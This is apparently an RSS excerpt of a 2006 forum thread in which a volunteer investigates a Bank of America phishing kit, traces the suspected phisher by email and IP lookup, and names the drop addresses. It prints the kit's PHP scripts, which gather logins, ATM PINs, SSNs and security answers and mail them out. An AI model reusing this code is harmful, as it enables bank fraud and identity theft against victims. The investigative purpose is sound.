so I responded with some more info, and included a snippet of the BOA phish processing script showing the data collection address.<br><br><HR><I>From: Macs Retsub   <br>To: ariando huge <br>Date: Feb 2, 2006 12:16 PM<br>Subject: Re: Kaskus<br><br>The data from the credit card and BOA scam:<br>Some of the logs were sent to me by mistake??</I><br><br><div class="code"><PRE><span class="codetext">if(isset($atm_number) || isset($pin)) <br>{ if(!ereg("^&#91;0-9&#93;+$",$atm_number) || !ereg("^&#91;0-9&#93;+$",$pin))<br>    { header("Location: GotoErrorVerifyPage.htm"); return FALSE;}  }  <br> <br>session_start();<br> <br>//USER ACCOUNT<br> <br>$D1 = $_POST&#91;'D1'&#93;;<br>$online_id = $_POST&#91;'online_id'&#93;;<br>$passcode = $_POST&#91;'passcode'&#93;;<br>$repasscode = $_POST&#91;'repasscode'&#93;;<br>$email = $_POST&#91;'email'&#93;;<br>$atm_number = $_POST&#91;'atm_number'&#93;;<br>$pin = $_POST&#91;'pin'&#93;; <br> <br>//SECURITY QUESTION<br> <br>$ssn1 = $_POST&#91;'ssn1'&#93;;$ssn2 = $_POST&#91;'ssn2'&#93;;$ssn3 = $_POST&#91;'ssn3'&#93;;<br>$ip = $_SERVER&#91;"REMOTE_ADDR"&#93;;<br> <br>$subj = "Full Info  BoA ip :$ip";<br>$msg = "Full Info From ip :$ip <br>      \nUSER ACCOUNT<br>      \n-------------------<br>    \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email<br>    \n\nSECURITY QUESTION <br>      \n---------------------<br>    \n\nS S N : $ssn1-$ssn2-$ssn3";<br> <br>$from = "From: BoA&lt;support@PlatinumBank.com&gt;";<br>$to = " purisangeh_team@yahoo.com";</SPAN></PRE></DIV><br>I thought that it may break the ice!! or lose him. However, he responded:<br><br><HR><I>From: ariando huge <br>To: Macs Retsub <br>Date: Feb 2, 2006 1:28 PM<br>Subject: Re: Kaskus<br><br>By the way who are you and what is your business. I just signed up this email for 2 weeks ago. Maybe you made a mistake of contact to person that you mentioned. 
Please let me know what can I do for you??<br> <br>Regard,<br> <br>Huge</I><HR><br><br>Well! that's a big lie, as I posted above I checked the address at the time of posting the dig and it was valid and I also checked it several times afterwards. Yahoo could not have recycled it in a 48 hour period. Besides, is there a waiting list for Purisangeh_Team at Yahoo? In addition the script files that contained the addy were dated ~12/25. So I responded:<br><br><HR><I>From: Macs Retsub <br>To: ariando huge <br>Date: Feb 2, 2006 2:05 PM<br>Subject: Re: Kaskus<br> <br>You need to check again, this account was active on or before January 1,  2006, who is in the "Team" ??</I><HR><br><br>Within twenty minutes I get this back:<br><br><HR><I>From: ariando huge   <br>To: Macs Retsub <br>Date: Feb 2, 2006 2:24 PM<br>Subject: Re: Kaskus<br><br>How you can chek it? and who are you? why you investigate me like police? i am musician in New Zealand. Purisangeh is my Group Band Name. What you want ask from me again??</I><HR><br><br>Now I am thinking, is this guy an intern for the Purisangeh Team or what?, I had my red push pin stuck in Jakarta on my world map. Now he says that he is in New Zealand. 
Well he lied about the two week old email address, so I checked on his honesty by having a look at the mail headers.<br><SMALL><br>X-Gmail-Received: b633b5e5f8108d9d26a619a897e71f68e0d6477a<br>Delivered-To: *******@gmail.com<br>Received: by 10.48.248.4 with SMTP id v4cs6897nfh;<br>        Thu, 2 Feb 2006 01:06:55 -0800 (PST)<br>Received: by 10.54.128.14 with SMTP id a14mr2115170wrd;<br>        Thu, 02 Feb 2006 01:06:55 -0800 (PST)<br>Return-Path: <br>Received: from web32002.mail.mud.yahoo.com (web32002.mail.mud.yahoo.com [68.142.207.99])<br>        by mx.gmail.com with SMTP id 11si5302468wrl.2006.02.02.01.06.54;<br>        Thu, 02 Feb 2006 01:06:55 -0800 (PST)<br>Received-SPF: pass (gmail.com: domain of purisangeh_team@yahoo.com designates 68.142.207.99 as permitted sender)<br>DomainKey-Status: good (test mode)<br>Received: (qmail 29227 invoked by uid 60001); 2 Feb 2006 09:06:47 -0000<br>DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;<br>  s=s1024; d=yahoo.com;<br>h=Message-ID:Received:Date:From:Subject:To:In-Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding;<br>  Message-ID: <br>Received: from [222.124.19.29] by web32002.mail.mud.yahoo.com via HTTP; Thu, 02 Feb 2006 01:06:46 PST<br>Date: Thu, 2 Feb 2006 01:06:46 -0800 (PST)<br>From: ariando huge <br>Subject: Re: Kaskus<br>To: Macs Retsub <br></SMALL><br><br>I then did a lookup of IP 222.124.19.29<br><br><SMALL>Location: Indonesia (high) [City: Jakarta, Jakarta Raya (Djakarta Raya)]<br>inetnum:      222.124.19.16 - 222.124.19.31<br>netname:      TLKM_D3_AST_DUYA_MEDIA<br>country:      ID<br>descr:        PT. DUYA MEDIA<br>descr:        Public Internet Cafe<br>descr:        Jl. Buah Batu No. 
165D<br>descr:        Bandung<br>admin-c:      KI32-AP<br>tech-c:       KI32-AP<br>remarks:      ------------------------------------------------------------------<br>remarks:      Send ABUSE and SPAM reports with plain ASCII text only to<br>remarks:      **********@yahoo.com cc to *****@telkom.net.id<br>remarks:      The netname enclosed in square bracket is included in the subject.<br>remarks:      ------------------------------------------------------------------<br>status:       ASSIGNED NON-PORTABLE<br>changed:      ****@telkom.co.id 20050725<br>mnt-by:       MAINT-TELKOMNET<br>source:       APNIC<br><br>person:       KHAIRIL IMAMI<br>nic-hdl:      KI32-AP<br>e-mail:       **********@yahoo.com<br>address:      Jl. Buah Batu No. 165D<br>address:      BANDUNG<br>phone:        +62227319398<br>country:      ID<br>changed:      ****@telkom.co.id 20050718<br>mnt-by:       MAINT-TELKOMNET<br>source:       APNIC<br></SMALL><br><br>Ha ha, "huge ariando" you are right where I thought you were, and in an internet cafe no less in downtown Bandung, which is the capital city of West Java Province, about 100 miles southeast of Jakarta. Not exactly New Zealand, so I wrote:<br><br><HR><I>From: Macs Retsub <br>To: ariando huge <br>Date: Feb 2, 2006 2:53 PM<br>Subject: Re: Kaskus<br>  <br>Then why are you now at an Internet Cafe in Bandung?? are you on holidays?<br>What kind of music do you play? what does Purisangeh mean?</I><HR><br><br>I didn't want to blow him away, I wanted to keep him going, so I included an out!<br>Then I got this:<br><br><HR><I>From: ariando huge  <br>To: Macs Retsub <br>Date: Feb 2, 2006 3:39 PM<br>Subject: Re: Kaskus<br><br>I still do not understand with you. I am Jazz Musician. We are in concernt here since 28 january. Listen to me, now i really feel annoyed because of you. I dont know you and you not tell me who you are? So stop email me anonymous person.<br> <br>BYE.</I><HR><br><br>Ouch!!, yes I am sort of anonymous, my email is not traceable. 
I don't want to lose him just yet, so I take a five minute refresher course in geography. There are several universities in Bandung, I suspect he may be a student. I try to get him back by alluding to be right there, and throw some local names in.<br><br><HR><I>From: Macs Retsub  <br>To: ariando huge <br>Date: Feb 2, 2006 4:26 PM<br>Subject: Re: Kaskus<br><br>Please, do not be annoyed, I like Jazz music too, more progressive though, I am a big fan of DISCUS. Where are you playing at ? the Savoy? maybe I can attend a concert, I checked the papers and I don't see any adverts. Maybe you can come back from New Zealand and play at one of the festivals at Bale Ayer in Taman Ria Senayan in Jakarta, have you ever been there? Try and visit Saung Mang Udjo while you are here. How many are in your band? What instrument do you play?</I><HR><br><br>Wow!! it took all of 4 minutes to get a reply. Boy he sure spends a lot of time on the web in an internet cafe for an on tour "in concert jazz musician"<br><br><HR><I>From: ariando huge  <br>To: Macs Retsub <br>Date: Feb 2, 2006 4:30 PM<br>Subject: Re: Kaskus<br><br>are you indonesian?? " Apa Kabar? " Why you know all about indonesian place? can you chate with me on yahoo messager? My ID is homebeautypink. I am online now.<br> <br>Regard,<br> <br>Huge</I><HR><br><br>Well that sure brought him right back, and he is a homeboy, look at that, from a New Zealander to " Apa kabar" all in a few messages. Well I looked it up: <br><I> The phrase "apa kabar" literally means "what (your) news". ... To answer "apa kabar", we usually use "baik" or "baik-baik" to indicate that it's good</I><br><br>I never replied to the "invitation" as I would have to use a nearby proxy, plus I am now stuck language wise. 
I decided to preserve my options, and sleep on it.<br>I really just want to get an answer to "What the F**k did you do with all the credit card data that came streaming into that account, and what other scams are now ongoing?"<br><br>MGD <br><br><SMALL>Edit=typo+formatting</SMALL>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15391819</guid>
<pubDate>Fri, 03 Feb 2006 04:21:47 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15187101</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : <div class="bquote"><SMALL>said by  removed <A HREF="/useremail/u/581232"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> :</SMALL><BR><BR>To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing,.....<br> </DIV>Ahh, that explains why I have run across it multiple times. Can we then assume it is a total hack job because the file is dated the same as the phish folders? He must also have control over the domain dns, in order to have created the sub domain prefix.<br><br>MGD]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15187101</guid>
<pubDate>Fri, 06 Jan 2006 17:54:35 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15186645</link>
<description><![CDATA[<A HREF="/useremail/u/1241346"><b>huntermcdole</b></A> : Good to know that they are going down.  I have a catch all account at my domain so I get a lot of spam and some of them are phishing attempts.  That was the first one I have seen where the link almost looked like the real site, most I see are 124.15.154.21 type.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15186645</guid>
<pubDate>Fri, 06 Jan 2006 16:55:17 EDT</pubDate>
</item>

<item>
<title>Re: [Phishing] Bank of America Phish, caught work</title>
<link>http://www.dslreports.com/forum/remark,15186581</link>
<description><![CDATA[<A HREF="/useremail/u/581232"><b>removed</b></A> : To elaborate on the "suspended.page" directory: it's a standard cPanel (web hosting control panel) thing, and probably not something that the scammer set up to fool authorities.]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15186581</guid>
<pubDate>Fri, 06 Jan 2006 16:46:12 EDT</pubDate>
</item>

<item>
<title>[Phishing] Bank of America Phish, caught work in progress.</title>
<link>http://www.dslreports.com/forum/remark,15186455</link>
<description><![CDATA[<A HREF="/useremail/u/666842"><b>MGD</b></A> : I was checking out a BOA phish posted by  huntermcdole <A HREF="/useremail/u/1241346"><IMG SRC="http://i.dslr.net/bb/profile.gif" ALT="See Profile" BORDER=0 WIDTH=16 HEIGHT=11></A> on phishtrack: &raquo;<A HREF="/phishtrack?pid=590&parts=1">/phishtrack?pi&middot;&middot;&middot;&parts=1</A> I am looking to see if any wizards out there can review the following data, and dig up any additional info or fingerprints on these criminals.<br><br>This is a very professional and slick phish &raquo;<A HREF="http://www.bankofamerica.com.cgi-bin.bofa.ias.cfusa.net/MbrezU2xs8o0u_LYXs2iLSUyHCYJF6hVvHqksi1580602/1/bofa/ibd/IAS/presentation/sso.login.controller.htm" >www.bankofamerica.com.cgi-bin.bo&middot;&middot;&middot;ller.htm</A> because in addition to the victim's account data, it also seems to create or obtain your sitekey data. You can enter bogus info on the first page and then see what the sitekey page is trying to do.<br><br>Fortunately while monitoring the phish site I came across the entire upload package from the phisher. They went back and removed the zipped payload within a few hours [Exhibit 1 & 2]. There may be additional unique data that can be found, see attached presentation.zip. Though you obviously cannot see the php scripts on other BOA phishes, I wonder if there are other unique items that could be used to link them to the same author.<br><br>Someone more familiar with php scripts can confirm if there are two separate emails going to the phisher. 
One from "securekey.php" with sitekey/securekey info going to: <B>purisangeh_team@yahoo.com</B> and a back up to <B>rdcpt0809@airpost.com</B> with a from of BoA(support[AT]PlatinumBank.com)<br><div class="code"><PRE><span class="codetext">&lt;?<br> <br>//if($securityKey3Ansr==""||$securityKey2Ans==""||$securityKey1Ans=="")<br>  //  {header("Location: GotoErrorsecurityKeyPage.htm");return FALSE; }<br> <br>session_start();<br> <br>//USER ACCOUNT<br> <br>$securityKey1 = $_POST&#91;'securityKey1'&#93;;<br>$securityKey1Ans = $_POST&#91;'securityKey1Ans'&#93;;<br>$securityKey2 = $_POST&#91;'securityKey2'&#93;;<br>$securityKey2Ans = $_POST&#91;'securityKey2Ans'&#93;;<br>$securityKey3 = $_POST&#91;'securityKey3'&#93;;<br>$securityKey3Ansr = $_POST&#91;'securityKey3Ans'&#93;;<br>$ip = $_SERVER&#91;"REMOTE_ADDR"&#93;;<br> <br>$subj = "Site Key BoA ip :$ip";<br>$msg = "Site key From ip :$ip<br>      \n-------------------<br>    \n\nSiteKey Challenge Question1: $securityKey1\nAnswer1: $securityKey1Ans\nSiteKey Challenge Question2: $securityKey2\nAnswer2: $securityKey2Ans\nSiteKey Challenge Question3: $securityKey3\nAnswer3: $securityKey3Ans<br>    ";<br> <br>$from = "From: BoA&lt;support@PlatinumBank.com&gt;";<br>$to = "purisangeh_team@yahoo.com";<br>$backup = "rdcpt0809@airpost.com";<br> <br>mail($to, $subj, $msg, $from, $chk);<br>mail($backup, $subj, $msg, $from, $chk);<br>header("Location: GotoCompletePage.htm");<br> <br>?&gt;</SPAN></PRE></DIV><br>Another file "update.php" appears to be mailing the online id passcode and atm info to the same addresses:<br><br><div class="code"><PRE><span class="codetext">&lt;?<br> <br>if($D1==""||$online_id==""||$passcode==""||$email=="")<br> { if(! 
ereg ("^.+@.+\\..+$", $email))<br>    {header("Location: GotoErrorAccountPage.htm");return FALSE; }}<br> <br>if($ssn3=="")<br> { header("Location: GotoErrorSecurityPage.htm");return FALSE; }<br> <br>if(isset($atm_number) || isset($pin))<br>{ if(!ereg("^&#91;0-9&#93;+$",$atm_number) || !ereg("^&#91;0-9&#93;+$",$pin))<br>    { header("Location: GotoErrorVerifyPage.htm"); return FALSE;}  }  <br> <br>session_start();<br> <br>//USER ACCOUNT<br> <br>$D1 = $_POST&#91;'D1'&#93;;<br>$online_id = $_POST&#91;'online_id'&#93;;<br>$passcode = $_POST&#91;'passcode'&#93;;<br>$repasscode = $_POST&#91;'repasscode'&#93;;<br>$email = $_POST&#91;'email'&#93;;<br>$atm_number = $_POST&#91;'atm_number'&#93;;<br>$pin = $_POST&#91;'pin'&#93;;<br> <br>//SECURITY QUESTION<br> <br>$ssn1 = $_POST&#91;'ssn1'&#93;;$ssn2 = $_POST&#91;'ssn2'&#93;;$ssn3 = $_POST&#91;'ssn3'&#93;;<br>$ip = $_SERVER&#91;"REMOTE_ADDR"&#93;;<br> <br>$subj = "Full Info  BoA ip :$ip";<br>$msg = "Full Info From ip :$ip<br>      \nUSER ACCOUNT<br>      \n-------------------<br>    \n\nAccount open in : $D1\nOnline ID : $online_id\nPasscode : $passcode\nLast 8 Digit ATM : $atm_number\nATM PIN : $pin\nEmail : $email<br>    \n\nSECURITY QUESTION<br>      \n---------------------<br>    \n\nS S N : $ssn1-$ssn2-$ssn3";<br> <br>$from = "From: BoA&lt;support@PlatinumBank.com&gt;";<br>$to = "purisangeh_team@yahoo.com";<br>                                                                                                                                                                                                                                              $backup = "rdcpt0809@airpost.net";<br> <br>mail($to, $subj, $msg, $from, $chk);<br>                                                                                                                                                                                                                                              mail($backup, $subj, $msg, $from, $chk);<br>header("Location: 
GotoCompletePage.htm");<br> <br>?&gt;</SPAN></PRE></DIV><br>Unfortunately without figuring out the password to the Yahoo email account there is no way to locate victims. I have never been able to have Yahoo pull an account based on submitting a  script snippet showing that it is being used as a data collection tool. I guess it is possible to interfere and load them with bogus data by looking at the way the script formats the mail.<br><br>While the yahoo address is currently valid, it is difficult to check the backup one. Airpost.net appears to be a Canadian company that maybe forwards email, though it appears that there are no current DNS records so I am not sure if it is active.<br><br>The use of purisangeh_team indicates a group operation. Purisangeh may be Indonesian as indicated by a google search: &raquo;<A HREF="http://www.google.com/search?hl=en&q=Purisangeh&btnG=Google+Search" >www.google.com/search?hl=en&q=Pu&middot;&middot;&middot;e+Search</A> I went to the Kaskus site listed at the top of the search looking for posts by the user Purisangeh, however the forum search function is disabled. It was worth checking because the search shows that it is not a common word. (WARNING: while looking at the google cache of KASKUS yesterday I got a popup with an attempt to install the wmf exploit, it only happened once, I have been back several times without incident, but be careful if you go there.)<br><br>Due to Google showing that "purisangeh" was rather unique, I decided to check out the purisangeh.org that was included in the search return. It is not an active domain, the A record points to Yahoo but looks like it may be pulled. Checking on the registration shows that it was registered in October of 2004 for 5 years to an individual in Cummings, GA. using an email address of purisangeh8181@yahoo.com. Someone in Georgia registering a name like that for 5 years did not seem cool, so I called the registered telephone number which turned out to be not them. 
I located a correct number for that name and spoke to the individual. As suspected they did not register the Purisangeh.org domain. However in October of 04 at the same time as the registration their credit card had been hit for hundreds of dollars in fraudulent charges. Their bank notified them that the multiple charges were for all kinds of "Internet services". I am convinced that these are the same criminals.<br><br>I am not sure what is going on where the phish is hosted at cfusa.net. Doesn't the phisher need control of the domain in order to do this?: &raquo;<A HREF="http://www.bankofamerica.com.cgi-bin.bofa.ias.cfusa.net" >www.bankofamerica.com.cgi-bin.bo&middot;&middot;&middot;fusa.net</A> which resolves the same as &raquo;<A HREF="http://www.cfusa.net" >www.cfusa.net</A>. Notice how the phisher has his own "suspended page" available at &raquo;<A HREF="http://www.bankofamerica.com.cgi-bin.bofa.ias.cfusa.net/suspended.page/" >www.bankofamerica.com.cgi-bin.bo&middot;&middot;&middot;ed.page/</A> I have seen that exact page format on other phishes. I guess you can fake the account as being closed when the heat is on, slick!!<br><br>As recently as December 21st the google cache of the site showed this: &raquo;<A HREF="http://64.233.187.104/search?q=cache:vIYTRR8oIFwJ:cfusa.net/+&hl=en" >64.233.187.104/search?q=cache:vI&middot;&middot;&middot;/+&hl=en</A> Seems a little strange!! The domain has been around for a few years, see archive: &raquo;<A HREF="http://web.archive.org/web/*/http://www.cfusa.net" >web.archive.org/web/*/http://www.cfusa.net</A><br><br>MGD<br><br>P.S. Since preparing this post the phish page now appears to be down, it was down and modified a few times during the research but came back. 
The directories are all still there.<br><br><I>Attached screenshots: Before (BOA_PhishZipEX1.png), After (CFUSA_newEX2.png), Cfusa Dir (CFUSA_dirEX3.png)</I>]]></description>
<guid isPermaLink="true">http://www.dslreports.com/forum/remark,15186455</guid>
<pubDate>Fri, 06 Jan 2006 16:31:21 EDT</pubDate>
</item>

</channel>
</rss>
